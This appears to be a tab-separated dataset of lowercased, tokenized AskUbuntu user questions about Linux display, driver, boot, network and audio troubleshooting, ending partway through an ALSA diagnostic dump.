492511	xrandr -- addmode does n't add to the wanted output ( dvi-i-0 ) , instead adding to hdmi-0	the monitor i use is a samsung syncmaster s24b300 , and no matter what the heck i do , ubuntu refuses to use 1920x1080 at 60hz for the output i want , despite my monitor ( which is unrecognized by the system even after i added the most recent nvidia driver ) supporting it . in fact , even weirder , when i follow the `` xrandr -- newmode `` name '' `` , '' xrandr -- addmode dvi-i-0 name '' , '' xrandr -- output dvi-i-0 -- mode name '' pattern , it lists under hdmi-0 . for reference , xrandr command esupanitix @ esupanitix-p6670t : ~ $ xrandr screen 0 : minimum 8 x 8 , current 1152 x 864 , maximum 8192 x 8192 dvi-i-0 connected primary 1152x864+0+0 ( normal left inverted right x axis y axis ) 0mm x 0mm 1024x768 60.0 + 1360x768 60.0 59.8 1152x864 60.0* 800x600 72.2 60.3 56.2 680x384 60.0 59.8 640x480 59.9 512x384 60.0 400x300 72.2 320x240 60.1 vga-0 disconnected ( normal left inverted right x axis y axis ) dvi-i-1 disconnected ( normal left inverted right x axis y axis ) hdmi-0 disconnected ( normal left inverted right x axis y axis ) 1920x1080_60.00 ( 0x26e ) 173.0mhz h : width 1920 start 2048 end 2248 total 2576 skew 0 clock 67.2khz v : height 1080 start 1083 end 1088 total 1120 clock 60.0hz but the xrandr command chain was esupanitix @ esupanitix-p6670t : ~ $ xrandr -- newmode `` 1920x1080_60.00 '' 173.00 1920 2048 2248 2576 1080 1083 1088 1120 -hsync +vsync esupanitix @ esupanitix-p6670t : ~ $ xrandr -- addmode dvi-i-0 1920x1080_60.00 //result : x error of failed request : badmatch ( invalid parameter attributes ) major opcode of failed request : 140 ( randr ) minor opcode of failed request : 18 ( rraddoutputmode ) serial number of failed request : 29 current serial number in output stream : 30 i tried making a .sh file and seeing if that would help , then made it executeable as a program and linked to it in the startup manager . # ! /bin/bash xrandr -- newmode `` 1920x1080_60.00 '' 173.00 1920 2048 2248 2576 1080 1083 1088 1120 -hsync +vsync xrandr -- addmode dvi-i-0 1920x1080_60.00 xrandr -- output dvi-i-0 -- mode 1920x1080_60.00 which resulted in the 1920x1080_60.00 mode being added to hdmi-0 of all things . so , what do i do ? i 'm confused beyond all belief here , and my monitor has no drivers for anything besides windows because surprise surprise , i 'm using a freaking samsung monitor . am i able to use substitute drivers or would the computer not recognize the monitor regardless ? i 've been digging and digging and digging through the forums for an answer , and so far they 've worked more against me than for me , to the point of requiring a live cd for recovery ; to the point of me having to use the ctrl+alt+f2 command line to edit a file so that i can log in again , and overall just adding frustration to a matter that seems like it would be perfectly fine to do considering windows is able to do this just fine without having a driver for this thing .
492512	can i load this ubuntu on a mac ppc laptop running osx 10.5.8 and if not is there a version that i can ?	can i load this ubuntu on a mac 1.5 ghz ppc g4 laptop with 1.5 gb ddr sdram running osx 10.5.8 and if not is there a version that i can ? it is a 17 '' non intel silver power pc .
492516	e : package 'xgraph ' has no installation candidate	i want to install ns2 on my ubuntu 12.04 . as usual am trying to install some essential software before installing it . i tried to install : sudo apt-get install perl xorg-dev g++ xgraph libxt-dev libx11-dev libxmu-dev and i get this message : reading package lists ... done building dependency tree reading state information ... done package xgraph is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'xgraph ' has no installation candidate what should i do ? i ve searched everywhere online for a solution but got none . how can i solve this ?
492519	copy output of terminal in question	i failed to copy/paste print screen output in my question box . how to copy/paste output of a shell command from terminal screen to askubuntu question box ?
492521	edit `` system tray '' in ldxe taskbar	using lubuntu here and i would love to remove icons from my system tray . will dconf-editor work on ldxe as well as unity ( ubuntu ) ? or are there any other solutions to modify the taskbar ? when i go to right-click on the taskbar to bring up the panel settings under the `` panel applets '' tab , the `` edit '' button for the system tray is greyed out . any way of organizing and removing icons from the system tray is appreciated . thanks .
492524	keyboard backlight software [ novatech n1716 ]	i have a novatech n1716 laptop : http : //www.novatech.co.uk/products/laptops/n1716.html it comes with a windows driver disk ( who would have thought ) , and now that i have switched to linux , i was wondering are there is universal keyboard backlight software , or anything ? i might be able to track down what type of backlight controller it is , but probably not .
492526	blinking moon of death since ssd upgrade on standby	i own a lenovo sl510 ( 4g ram ) and i just upgraded it with a samsung 840 evo 120g . previously i was using ubuntu . later on i switched to linux mint nadia . at the very beginning ( ubuntu 10.10 i guess ) i remember having problems getting my system into suspend to ram . but this vanished with 11.04 . i am using 14.04 now . after the ssd upgrade the problem occurs again . i set my notebook to standby using either fn + f4 , sudo pm-suspend or the menu . all three fail with the same symptom : lcd goes black ( even backlight ) fan stays powered power-led blinks ( `` blinking moon of death '' ) i can not recover the notebook from standby . i have to kill it by pressing 5s the power button . the weird thing is that it does n't occur always . in about 20 % of cases standby works as expected . patterns observed : immediately after power-up a standby never works if after standby-ing the logon-screen appears , standby always works but sometimes standby works also without a visible logon-screen after standby worked first time during a session , it 's not guaranteed but more likely to work again so to all the sherlock holmes out there : i 'm sure the problem can be fixed ! there are many forum entries for this very particular topic but none had a working solution . i already tried debugging and fixing this on various ways but i was not fortunate . what i want to do now is a focused search for the error . i will start with posting log-messages and debugging steps in the comments .
492531	windows 8 and ubuntu 14.04 ( windows will not load - loops prepairing to repair windows ) asus rog g750jw	i have windows 8 on my first drive which is 1 tb and ubuntu on the secondary drive which is 500 gb . i attempted installing grub2 and updating . ( see pictures below to see partitions ) i followed this and now i ca n't get into windows at all . no grub and ca n't boot into windows 8 after installing ubuntu 12.10 can someone give me a walk through to fix this mess ? last time i used ubuntu dual boot was 2010 . i 'm prepairing a usb iso of ubuntu as several tutorials suggest i can fix it with a live usb . but they are for older distros and i 'm not sure it will work .
492534	re-installed dropbox proxy issues under pangolin	i have uninstalled and re-installed dropbox from the deb package . when starting the computer , dropbox starts automatically but states : '' incorrect proxy '' and i have to remove the process manually . when entering : sudo https_proxy=https : //your_proxy : proxy_port dropbox start -i i get : starting dropbox ... dropbox is n't running ! done ! however , entering dropbox status gets dropbox is n't running ! but entering the proxy script again , dropbox is already running ! system monitor does not show dropbox however . any suggestions ?
492535	google crome not install	when i install google crome i am getting this error . help me i have run this command in tem directory wget https : //dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb after that i run this command sudo dpkg -i ./google-chrome*.deb i am getting this error jaskaran @ jaskaran-vostro-1550 : /tmp $ sudo dpkg -i ./google-chrome*.debdpkg : error processing ./google-chrome-stable_current_amd64.deb ( -- install ) : package architecture ( amd64 ) does not match system ( i386 ) errors were encountered while processing : ./google-chrome-stable_current_amd64.deb please check it
492536	14.04 - ca n't mount an sd xc encripted	i have an encrypted sc xc card , but now i ca n't simple access it . card reader is working ; i 've used with other sd cards and works as expected . when i plug my encrypted card , it does n't mount automatically and system log register these : [ 7679.016980 ] sd 6:0:0:0 : [ sdb ] unit not ready jul 6 21:10:26 daniel-macbookair kernel : [ 7679.016991 ] sd 6:0:0:0 : [ sdb ] jul 6 21:10:26 daniel-macbookair kernel : [ 7679.016996 ] sense key : medium error [ current ] jul 6 21:10:26 daniel-macbookair kernel : [ 7679.017004 ] sd 6:0:0:0 : [ sdb ] jul 6 21:10:26 daniel-macbookair kernel : [ 7679.017010 ] add . sense : incompatible medium installed jul 6 21:10:26 daniel-macbookair kernel : [ 7679.020853 ] sd 6:0:0:0 : [ sdb ] read capacity failed jul 6 21:10:26 daniel-macbookair kernel : [ 7679.020861 ] sd 6:0:0:0 : [ sdb ] jul 6 21:10:26 daniel-macbookair kernel : [ 7679.020865 ] result : hostbyte=did_ok driverbyte=driver_sense jul 6 21:10:26 daniel-macbookair kernel : [ 7679.020869 ] sd 6:0:0:0 : [ sdb ] jul 6 21:10:26 daniel-macbookair kernel : [ 7679.020872 ] sense key : medium error [ current ] jul 6 21:10:26 daniel-macbookair kernel : [ 7679.020879 ] sd 6:0:0:0 : [ sdb ] jul 6 21:10:26 daniel-macbookair kernel : [ 7679.020883 ] add . sense : incompatible medium installed jul 6 21:10:26 daniel-macbookair kernel : [ 7679.022101 ] sd 6:0:0:0 : [ sdb ] test wp failed , assume write enabled jul 6 21:10:26 daniel-macbookair kernel : [ 7679.023343 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed jul 6 21:10:26 daniel-macbookair kernel : [ 7679.023351 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through jul 6 21:10:26 daniel-macbookair kernel : [ 7679.023965 ] sd 6:0:0:0 : ioctl_internal_command return code = 8000002 jul 6 21:10:26 daniel-macbookair kernel : [ 7679.023970 ] : sense key : medium error [ current ] jul 6 21:10:26 daniel-macbookair kernel : [ 7679.023977 ] : add . sense : incompatible medium installed jul 6 21:10:26 daniel-macbookair kernel : [ 7679.025968 ] sd 6:0:0:0 : [ sdb ] unit not ready jul 6 21:10:26 daniel-macbookair kernel : [ 7679.025974 ] sd 6:0:0:0 : [ sdb ] jul 6 21:10:26 daniel-macbookair kernel : [ 7679.025978 ] sense key : medium error [ current ] jul 6 21:10:26 daniel-macbookair kernel : [ 7679.025984 ] sd 6:0:0:0 : [ sdb ] jul 6 21:10:26 daniel-macbookair kernel : [ 7679.025989 ] add . sense : incompatible medium installed jul 6 21:10:26 daniel-macbookair kernel : [ 7679.029727 ] sd 6:0:0:0 : [ sdb ] read capacity failed jul 6 21:10:26 daniel-macbookair kernel : [ 7679.029734 ] sd 6:0:0:0 : [ sdb ] jul 6 21:10:26 daniel-macbookair kernel : [ 7679.029738 ] result : hostbyte=did_ok driverbyte=driver_sense jul 6 21:10:26 daniel-macbookair kernel : [ 7679.029742 ] sd 6:0:0:0 : [ sdb ] jul 6 21:10:26 daniel-macbookair kernel : [ 7679.029745 ] sense key : medium error [ current ] jul 6 21:10:26 daniel-macbookair kernel : [ 7679.029751 ] sd 6:0:0:0 : [ sdb ] jul 6 21:10:26 daniel-macbookair kernel : [ 7679.029756 ] add . sense : incompatible medium installed jul 6 21:10:26 daniel-macbookair kernel : [ 7679.031088 ] sd 6:0:0:0 : [ sdb ] test wp failed , assume write enabled jul 6 21:10:26 daniel-macbookair kernel : [ 7679.032212 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed jul 6 21:10:26 daniel-macbookair kernel : [ 7679.032218 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through jul 6 21:10:26 daniel-macbookair kernel : [ 7679.032964 ] sd 6:0:0:0 : ioctl_internal_command return code = 8000002 jul 6 21:10:26 daniel-macbookair kernel : [ 7679.032971 ] : sense key : medium error [ current ] jul 6 21:10:26 daniel-macbookair kernel : [ 7679.032978 ] : add . sense : incompatible medium installed jul 6 21:10:26 daniel-macbookair kernel : [ 7679.036713 ] sd 6:0:0:0 : ioctl_internal_command return code = 8000002 jul 6 21:10:26 daniel-macbookair kernel : [ 7679.036721 ] : sense key : medium error [ current ] jul 6 21:10:26 daniel-macbookair kernel : [ 7679.036729 ] : add . sense : incompatible medium installed jul 6 21:10:26 daniel-macbookair kernel : [ 7679.037603 ] sd 6:0:0:0 : ioctl_internal_command return code = 8000002 jul 6 21:10:26 daniel-macbookair kernel : [ 7679.037613 ] : sense key : medium error [ current ] jul 6 21:10:26 daniel-macbookair kernel : [ 7679.037624 ] : add . sense : incompatible medium installed jul 6 21:10:26 daniel-macbookair kernel : [ 7679.040357 ] sd 6:0:0:0 : ioctl_internal_command return code = 8000002 jul 6 21:10:26 daniel-macbookair kernel : [ 7679.040369 ] : sense key : medium error [ current ] jul 6 21:10:26 daniel-macbookair kernel : [ 7679.040382 ] : add . sense : incompatible medium installed jul 6 21:10:26 daniel-macbookair kernel : [ 7679.041148 ] sd 6:0:0:0 : ioctl_internal_command return code = 8000002 jul 6 21:10:26 daniel-macbookair kernel : [ 7679.041160 ] : sense key : medium error [ current ] jul 6 21:10:26 daniel-macbookair kernel : [ 7679.041171 ] : add . sense : incompatible medium installed jul 6 21:10:26 daniel-macbookair kernel : [ 7679.043581 ] sd 6:0:0:0 : ioctl_internal_command return code = 8000002 jul 6 21:10:26 daniel-macbookair kernel : [ 7679.043588 ] : sense key : medium error [ current ] jul 6 21:10:26 daniel-macbookair kernel : [ 7679.043595 ] : add . sense : incompatible medium installed jul 6 21:10:26 daniel-macbookair kernel : [ 7679.044204 ] sd 6:0:0:0 : ioctl_internal_command return code = 8000002 jul 6 21:10:26 daniel-macbookair kernel : [ 7679.044208 ] : sense key : medium error [ current ] jul 6 21:10:26 daniel-macbookair kernel : [ 7679.044214 ] : add . sense : incompatible medium installed
492537	very slow download speed 14.04	so i have been duel booting for a couple week but today was the first time i really tried downloading anything . i came across the problem of it being almost unbearble slow . with it maxing out at 1.3mb . i have a 15mb connection and on windows it will use all of it . i have done this exact download on windows and it 's taking 10 times longer . i have disabled ipv6 but i do n't know what to do next . my router is rather old . i do n't know the speacific of my wifi card ( sorry ) . but i have a feeling that is n't the issue ( unless it 's some weird driver thing ) . so is there any `` fix '' to this when dealing with ubuntu ?
492540	emulator frontend for controllers ?	i’m working on building a mame cabinet-type project . this is my first endeavour of this type and i am still relatively new to using ubuntu . i have an zotac mag hd-nd01 ( intel atom/2gbram/160gbhdd ) that i’ve installed lubuntu 14.04 on . my biggest issue is that i’m looking for an emulator front-end that works well with many emulator types and is great with using a usb controller ( ps2/ps3 or generic controller ) . researching online doesn’t really provide me with the information that im looking for without all the comments being 5-8 years old . i plan on putting this zotac in my entertainment system where the hope is that i could just turn it on , and grab a controller without needing a mouse/keyboard . any help would be greatly appreciated .
492541	can not access master account	i hope i 'll be able to explain this well , so pls bear with me ... firstly , i got ubuntu 12.4 i forgot the password for my admin account , so i changed it in thhe grub- in recovery mode . after i 've been able to access only the guest account , where at least i changed the option login withou passwd for my admin account ( obviously at this point the passwd worked since for changing this option u need sudo privileges ) however , i still couldnt log in into my master account- when i click on login on startup , the page goes black , then comes back to the same point where u select users . i tried many different options- probably messed it up too ! but i am not able to even use the password again in the guest account . im totally logged out , pls help . note that a solution without using a dvd/bootable usb to fix grub/linux would be much more preferred ! since im travelling in remote areas : p
492543	ubuntu 12.04 laptop connects to one wpa2-personal network but not another	my nephew 's windows 7-ubuntu 12.04 1aptop connects to the wpa2-perosnal wireless network in his own house under windows 7 but not ubuntu 12.04 . however , when it is brought to my house , it connects to my wpa2-personal wireless network without any trouble under ubuntu 12.04 . it has plenty of spare system memory and hard-disk space . if i take my ubuntu 12.04 apple laptop to his place , it connects all right to his wpa2-personal wireless network . this problem first appeared after some virtual-machine software was added to windows 7 on the first-mentioned laptop . i would like to know how to debug this problem and will appreciate very much any advice . julian
492544	difference between `` - '' and `` -- '' in linux command	i often see a single dash - or double dash -- followed by linux commands or other installed linux programs . what are the differences between single dash and double dashes ? is it just about abbreviation ? for example , -v means -- verbose most of the time .
492548	mouse/keyboard not working in ubuntu 14.04 lts	ok my problem is that when i try to install ubuntu or even 'try ' ubuntu on my computer the mouse will turn on for about 2-3 seconds then turn off . the keyboard is wireless and does n't work either . i am using an old logitec keyboard for now that works its using the purple plug ( do n't know name ) and it works but i can not finish the install because i need to mouse to do something . i have tried multiple mice and keyboards only the keyboard with the purple plug ( do n't remember name ) works . none of my mice work i have razor tapian and these el-cheapo mouses none of which work . purple plug is circle and has holes in it . i found out it was called ps/2 port . thanks for the help .
492551	dlink 580tx quad nic issue	i created a dual boot windows 7 / linux ubuntu x64 machine i have a ethernet port from the motherboard and 3x dlink 580 tx quad nic cards . i am having an issue where the quad nics are not working correctly i am able to connect to the internet with my integrated nic port but not thru the others i have hard coded all ports to 100mb / fd / auto-neg off they are recognized , physical card lights up , but not able to connect out to the internet with them . i have just installed linux and new to this os and havent installed any other drivers along with it . is there a separate installation procedure for these quad nic cards ? @ gns3lab : ~ $ lspci | grep ethernet 00:19.0 ethernet controller : intel corporation ethernet connection ( 2 ) i218-v 05:04.0 ethernet controller : d-link system inc dl10050 sundance ethernet ( rev 12 ) 05:05.0 ethernet controller : d-link system inc dl10050 sundance ethernet ( rev 12 ) 05:06.0 ethernet controller : d-link system inc dl10050 sundance ethernet ( rev 12 ) 05:07.0 ethernet controller : d-link system inc dl10050 sundance ethernet ( rev 12 ) 06:04.0 ethernet controller : d-link system inc dl10050 sundance ethernet ( rev 12 ) 06:05.0 ethernet controller : d-link system inc dl10050 sundance ethernet ( rev 12 ) 06:06.0 ethernet controller : d-link system inc dl10050 sundance ethernet ( rev 12 ) 06:07.0 ethernet controller : d-link system inc dl10050 sundance ethernet ( rev 12 ) 07:04.0 ethernet controller : d-link system inc dl10050 sundance ethernet ( rev 15 ) 07:05.0 ethernet controller : d-link system inc dl10050 sundance ethernet ( rev 15 ) 07:06.0 ethernet controller : d-link system inc dl10050 sundance ethernet ( rev 15 ) 07:07.0 ethernet controller : d-link system inc dl10050 sundance ethernet ( rev 15 ) commands i have used gksudo gedit /etc/rc.local file edited to include the commands listed below '' ethtool -s eth0 speed 100 duplex full autoneg off ''
492552	black screen on boot after each boot with nomodeset	i have a black screen after the grub init . i have a debian installation . i followed many instructions and i 've found that i can just edit when the grup start and add the following info to my grub edit nomodeset the system start with a minimal quality and even if i try to install other graphic drivers it 's not working . once i restart my machine the problem happen again my graphic card is intell and i do n't know how to fix this issue permanently as i need to do this configuration each time i boot my system . kind regards
492554	unable to login after removing guest account	hello i try to disable the guest account in ubuntu 14.04 by typing these commands sudo gedit /etc/lightdm/lightdm.conf allow-guest=false after re-staring ubuntu it boot up but dos not go to log-in screen just no signal appears on moniter . please please help me .
492555	general tips/ strategies for troubleshooting driver issues ?	before i ask a question about each of the multiple driver issues i am having , what are some things i can do to either attempt to fix the issues myself or to at least provide helpful information in my question ? i realize many proprietary drivers do unorthodox things , but perhaps there are general strategies that work for most drivers . background : i am using ubuntu 14.04 . i know some bash but not much about linux drivers . examples of what i am looking for : finding error logs and system configuration information deciding which of the above information is relevant and what it means any essential information i should know about how ubuntu drivers work tips for particular types of issues : totally dead ( hardware does not seem to even be detected ) intermittent problems ( such as hardware that works initially but stops working seemingly at random or after the screen locks ) configuration problems ( for example , where to find configuration files and how to preserve configuration set by guis after logout ) alternate drivers ( when more than one driver is available for the same hardware ) differences between categories ( sound/ graphics/ mouse/ network/ etc ... ) anything else that might help ... ? what i have already tried : googling and searching on askubuntu - perhaps i do not know the right terms to use ? dmesg and system logs - have way too much information !
492559	in my system details my graphics line is blank	i tried updating my drivers and i typed these following commands into a terminal sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install nvidia-current however now my graphics space is empty and i can not play my games without it crashing is there any way to fix this/undo it ?
492565	problem inputting indian rupee sign via xkb	i 'm from india but mostly just using the default `` us '' keyboard layout . i tried to modify it to input the indian rupee sign u+20b9 . i modified /usr/share/x11/xkb/symbols/us as follows : key < ae04 > { [ 4 , dollar , u20b9 , u00a7 ] } ; // 20b9 = indian rupee sign , 00a7 = section sign of course i cleaned out the old *.xkm in /var/lib/xkb/ , rebooted etc but still i am not able to input u+20b9 using my level 3 key ( win key ) though i am getting u+00a7 section mark using level 4 ( win + shift ) . i tried to remap the character to another key ( r ) but that did n't work either . i tried to use the inbuilt : include `` rupeesign ( 4 ) '' ... but that did n't work either . i am using kubuntu trusty 64 bit . please help me fix this . [ iow the question reads : `` how to fix this ? '' ! : - ) ] thank you .
492567	how to upgrade ubuntu 12.04 lts to 14.04 lts in dual boot ?	i am using dual operating systems ( windows 7 ultimate + ubuntu 12.04 ) now i want to upgrade ubuntu to 14.04.can i directly boot again and replace the old version.i am trying to update from update manager but its is upgrading to 12.10.please let me know if it is possible to replace or shall i continue with update manager . thank you
492572	how do i get randomness in command-line ?	how to randomly execute one command within specified list of command ? helpful for randomly choosing startup sound , wallpaper or executing commands . in general , if i have commands for execution as follows then how do i get randomness : ? # ! /bin/bash < command_1 > < command_2 > < command_3 > . . . < command_n > then i want to execute randomly only one command from above possibilities when script is run ! how to do that ?
492573	vmplayer never keep virtual machines on library ?	i have installed `` vmplayer ( version 6.0.2 build-1744117 ) '' on my ubuntu 14.04 lts . i have created 3 virtual machines on my home directory . when i open vmplayer , library always empty and every time i have to browse and select them to open . i tried different folder permissions and it did n't help . current folder permission is 755 and owner is current user ( me ) . how do i keep my vms on library , any idea ? thanks .
492575	bluetooth can not search other device in dell vostro 2520	recently i have installed ubuntu 14.04 in my laptop dual boot with windows 7 . in windows 7 i can send and browse files over bluetooth , but in ubuntu unable to find other device ( such as my phone ) . and my laptop bluetooth is also not visible in other device . any idea to solve the problem ?
492579	can not install tux the penguin : a quest for herring	i get this error when running configure : loading cache ./config.cache checking for a bsd compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking whether make sets $ { make } ... yes checking for working aclocal ... missing checking for working autoconf ... missing checking for working automake ... missing checking for working autoheader ... missing checking for working makeinfo ... missing checking for gcc ... gcc checking whether the c compiler ( gcc ) works ... yes checking whether the c compiler ( gcc ) is a cross-compiler ... no checking whether we are using gnu c ... yes checking whether gcc accepts -g ... yes checking how to run the c preprocessor ... gcc -e checking for c++ ... no checking for g++ ... no checking for gcc ... gcc checking whether the c++ compiler ( gcc ) works ... no configure : error : installation or configuration problem : c++ compiler can not create executables . do you have any solutions ?
492580	ssd size dissapearing	i recently have been low on ssd space , i can usually manage with very little space . today i decided to try to create a windows vm on virtualbox . i did a `` df -h '' to check my disk space left and it said i had about 8gb available of 110gb . after allocating a 5gb hard drive of the virtual machine i realized that windows needs at least 8gb to install . i removed the virtual machine uninstalled virtualbox ( apt-get purge virtualbox . ) after the installation i did another `` df -h. '' i realized that i only had about 2gb left on my system . it seems as if the virtual hard drive never got deleted . i ran a search for and virtual hard disks and i could n't find any . i decided there may have been a glitch , so i restarted my computer . when my computer booted back up df reported that the size of my ssd was now 103gb instead of the previous 110gb as if the space magically disappeared . is there something that i 'm missing here ? note : my operating system is kubuntu 14.04 . since this question has nothing to do about kde as far as i 'm aware of i thought this would be a good place to post this .
492583	usb headphone goes mute before 0 %	i have a weird issue with my usb headphones . on ubuntu , i can only control around 2/3 of the volume ; whenever i adjust it below 1/3 of the max , there is no sound anymore . and sometimes this is really annoying as , in a few cases , 1/3 is really loud and `` 1/3 - 1 '' is mute . has anyone else experienced this issue ? i could n't find out what the problem is ... thank you in advance .
492584	graphic drivers for hd6850m ubuntu 14.04	this is my *nth attempt to switch to ubuntu , but the thing that always stops me are the mobile drivers for my graphic card . i have this laptop and even on windows i had trouble with the drivers ( intel mobile + radeon hd ) . basically the only one working is the one from the page i posted ( hp website ) . on windows if i 'd go to the amd page and download the latests drivers , after reboot i will have black screen and unless i had a system restore point , i had to reinstall the o.s . now , after installing ubuntu 14.04 , i went to `` additional drivers '' and i found this and tried to install the fglrx ( proprietary ) . after reboot , the screen went black . after another 2 reboots it finally showed the desktop and i was able to start ubuntu , but the drivers were not applied . i ran the fglrxinfo command but it said it was not recognized . finally my question is , am i suppose to remain without drivers or is there any possible solution ? just in case it 's needed , in my `` all settings/display '' the graphics is `` intel速 sandybridge mobile ''
492585	hp wireless printing not working	i can print from my laptop via usb with hplip . but unable to print wirelessly ( over wi-fi ) . printer model : hp ink advantage 3545 e-all-in-one printer . ubuntu version : 14.04 ( trusty )
492587	windows 7/ubuntu 14.04 dual boot error , uefi system	first - yes , there are a bunch of similar questions . trust me , if any of them had fixed this , i would n't be here . alright . so i built my own pc , installed windows 7 on it . i 've been wanting to install ubuntu 14.04 as a dual boot ( first linux install for me , though i 've used it a little otherwise ) . i downloaded the iso ( 64-bit ) , burned to a flash drive using rufus . when trying to boot from it , i can get to the grub installer , can edit boot options ( i 've been removing quiet-splash to see any errors ) but every time ( both using flash drive , and later a cd ) get the same error . error message is similar to http : //ubuntuforums.org/showthread.php ? t=2119173 - freeze at ata2 : hard resetting link . -using nomodeset as part of boot options in grub - ( per the linked thread ) asmedia ports disabled -uefi enabled -tried burning in both mbr and gtp , just in case one happened to work while the other did n't . no luck . -secure boot disabled i created a partition for it already , so it 'll have space if it can ever get past the errors . would very much appreciate any advice , ideas to try , voodoo , and the like .
492589	touchscreen stopped working after restart	i 'm having problem with my touch screen . the touch screen was working at first during trial and even after installation . upon calibration , i restared my laptop and the touch screen feature is not working anymore . i have ubuntu 14.04 and installed gnome session . my laptop is an old toshiba ss 1700my came from japan with intel core 2 solo .
492592	can i get italics in gnome-terminal ?	after a lot of searching i can not find a way to get gnome-terminal to display italic fonts . i 'm running version 3.6.2 . specifically i would like vim to display comments in italics ; i 've added highlight comment cterm=italic to my .vimrc but it does n't work . does anyone know if this can be done ?
492594	graphic problems	i downloaded ubuntu 14.04 lts 64 bit and installed it , but when i boot up it says `` picture mode can not be displayed maximum res . 1280x1024 60hz '' any help ?
492595	terminal in gnome 3 : disable audible bell , enable visual bell	for years , nay , decades ( literally â two ! ) , i have visual bell enabled in my terminals whenever possible , be it a humble xterm or gnome terminal . recently , after i switched from unity to gnome 3 , i an audible bell ( over stereo speakers ) in gnome terminal . my searches up to now always seem to lead into the wrong direction : how to enable the audible bell or how to disable the whole thing completely . thatâs not my intention . when at the prompt , when i press backspace too often of just before auto-completion , i want the terminal window to flicker , and i do not want to hear anything . where is this setting hidden ?
492597	how to save changes made in a live session to hard disk ?	i have ubuntu 13.10 and i am running live image as making an entry in grub as per the tutorial : http : //www.tecmint.com/run-linux-live-images-from-hard-disk-in-linux . so is there any way to make the changes persist ? i want to save few changes like my wireless drivers , so if i am able to do so , it would save me from installing drivers every time i boot .
492599	how to install and test kde plasma 5 on ubuntu 14.04	kde plasma 5 is hiting release candidate now . https : //techbase.kde.org/schedules/plasma_5 # 5.0_release_candidate : _thu_3_july_tagging.2c_tue_8_july_release how can i install plasma 5 in ubuntu 14.04 .
492602	using ubuntu 12.04 , no audio output	! ! # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ! ! alsa information script v 0.4.63 ! ! # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # ! ! script ran on : sun jul 6 20:06:22 utc 2014 ! ! linux distribution ! ! -- -- -- -- -- -- -- -- -- ubuntu 12.04.3 lts \n \l distrib_id=ubuntu distrib_description= '' ubuntu 12.04.3 lts '' name= '' ubuntu '' id=ubuntu id_like=debian pretty_name= '' ubuntu precise ( 12.04.3 lts ) '' ! ! dmi information ! ! -- -- -- -- -- -- -- - manufacturer : sony corporation product name : vpcea43eg product version : c607m6bq firmware version : r1140y8 ! ! kernel information ! ! -- -- -- -- -- -- -- -- -- kernel release : 3.2.0-54-generic-pae operating system : gnu/linux architecture : i686 processor : i686 smp enabled : yes ! ! alsa version ! ! -- -- -- -- -- -- driver version : 1.0.24 library version : 1.0.25 utilities version : 1.0.25 ! ! loaded alsa modules ! ! -- -- -- -- -- -- -- -- -- - snd_hda_intel ! ! sound servers on this system ! ! -- -- -- -- -- -- -- -- -- -- -- -- -- -- pulseaudio : installed - yes ( /usr/bin/pulseaudio ) running - yes esound daemon : installed - yes ( /usr/bin/esd ) running - no ! ! soundcards recognised by alsa ! ! -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 0 [ intel ] : hda-intel - hda intel hda intel at 0xf6000000 irq 44 ! ! pci soundcards installed in the system ! ! -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) ! ! advanced information - pci vendor/device/subsystem id's ! ! -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 00:1b.0 0403 : 8086:3b56 ( rev 05 ) subsystem : 104d:9071 ! ! modprobe options ( sound related ) ! ! -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- snd-atiixp-modem : index=-2 snd-intel8x0m : index=-2 snd-via82xx-modem : index=-2 snd-usb-audio : index=-2 snd-usb-caiaq : index=-2 snd-usb-ua101 : index=-2 snd-usb-us122l : index=-2 snd-usb-usx2y : index=-2 snd-cmipci : mpu_port=0x330 fm_port=0x388 snd-pcsp : index=-2 snd-usb-audio : index=-2 ! ! loaded sound module options ! ! -- -- -- -- -- -- -- -- -- -- -- -- -- - ! ! module : snd_hda_intel align_buffer_size : y bdl_pos_adj : 1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 beep_mode : 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 enable : y , y , y , y , y , y , y , y , y , y , y , y , y , y , y , y , y , y , y , y , y , y , y , y , y , y , y , y , y , y , y , y enable_msi : -1 id : ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) index : -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 , -1 model : ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) patch : ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , ( null ) , 